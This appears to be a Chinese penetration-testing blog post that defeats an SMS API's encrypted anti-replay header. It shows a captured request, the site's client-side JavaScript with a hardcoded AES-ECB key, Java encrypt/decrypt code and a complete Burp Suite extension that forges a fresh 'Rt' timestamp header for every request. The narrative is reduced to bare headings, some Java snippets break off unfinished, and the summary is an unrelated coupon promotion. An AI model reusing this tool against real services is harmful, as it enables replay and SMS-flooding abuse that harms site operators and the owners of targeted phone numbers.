1
前言
2
背景
3
收集信息
4
绕过防重放字段
POST /api/sms/sendsms HTTP/2
Host: xxx
Content-Length: 73
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer null
Rt: /5asJSe+gKXuuIdOsOg6kw==
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Api-Version: 1.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"phone":"1888888881","smsTypes":2,"uniqueId":"1684756825417","code":""}
var aeskey2 = '1122334455667788';
xxxxx
function encryptRt(data) {
var key = CryptoJS.enc.Utf8.parse(aeskey2);
// 加密
var encryptedData = CryptoJS.AES.encrypt(data, key, {
mode: CryptoJS.mode.ECB,
padding: CryptoJS.pad.Pkcs7
});
return encryptedData + '';
}
xxx
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.Security;
import java.util.Base64;
public class AESUtils {
static {
Security.addProvider(new BouncyCastleProvider());
}
public static String decryptData(String data, String key) throws Exception {
byte[] keyBytes = key.getBytes("UTF-8");
SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS7Padding");
cipher.init(Cipher.DECRYPT_MODE, keySpec);
byte[] decrypted = cipher.doFinal(Base64.getDecoder().decode(data));
return new String(decrypted, "UTF-8");
}
public static void main(String[] args) throws Exception {
String aesKey = "1122334455667788";
String data = "/5asJSe+gKXuuIdOsOg6kw==";
String decryptData = decryptData(data, aesKey);
System.out.println(decryptData);
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.Security;
import java.util.Base64;
public class AESUtils {
static {
Security.addProvider(new BouncyCastleProvider());
}
public static String encryptData(String data, String key) throws Exception {
byte[] keyBytes = key.getBytes("UTF-8");
SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS7Padding");
cipher.init(Cipher.ENCRYPT_MODE, keySpec);
byte[] encrypted = cipher.doFinal(data.getBytes("UTF-8"));
return Base64.getEncoder().encodeToString(encrypted);
}
public static String decryptData(String data, String key) throws Exception {
byte[] keyBytes = key.getBytes("UTF-8");
SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS7Padding");
cipher.init(Cipher.DECRYPT_MODE, keySpec);
byte[] decrypted = cipher.doFinal(Base64.getDecoder().decode(data));
return new String(decrypted, "UTF-8");
}
5
封装插件,开始渗透
package burp;
import java.io.PrintWriter;
import java.util.Arrays;
import java.util.List;
public class BurpExtender implements IBurpExtender, IHttpListener
{
private IBurpExtenderCallbacks callbacks;
private IExtensionHelpers helpers;
private PrintWriter stdout;
private PrintWriter mStdOut;
// implement IBurpExtender
@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
{
stdout = new PrintWriter(callbacks.getStdout(), true);
this.callbacks = callbacks;
helpers = callbacks.getHelpers();
callbacks.setExtensionName("Rt_replace_Demo");
callbacks.registerHttpListener(this);
//this.mStdOut.println("Author: fu11y");
}
@Override
public void processHttpMessage(int toolFlag,boolean messageIsRequest,IHttpRequestResponse messageInfo)
{
try{
if (toolFlag == 64 || toolFlag == 16 || toolFlag == 32 || toolFlag == 4){
if (messageIsRequest){
IRequestInfo analyzeRequest = helpers.analyzeRequest(messageInfo);
String request = new String(messageInfo.getRequest());
byte[] body = request.substring(analyzeRequest.getBodyOffset()).getBytes();
List<String> headers = analyzeRequest.getHeaders();
for(String header : headers){
stdout.println("header"+header);
if(header.startsWith("Rt")){
headers.remove(header);
break;
}
}
long currentTimestampSeconds = System.currentTimeMillis();
String aesKey = "1122334455667788";
String data = String.valueOf(currentTimestampSeconds);
String Rt = "Rt: "+ReplaceRt.encryptData(data,aesKey);// 替换header中的Rt
headers.add(Rt);
stdout.println(Rt);
byte[] new_Request = helpers.buildHttpMessage(headers,body);
stdout.println(helpers.analyzeRequest(new_Request).getHeaders());
messageInfo.setRequest(new_Request);
}
}
}
catch(Exception e){
stdout.println(e);
}
}
}
6
总结
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放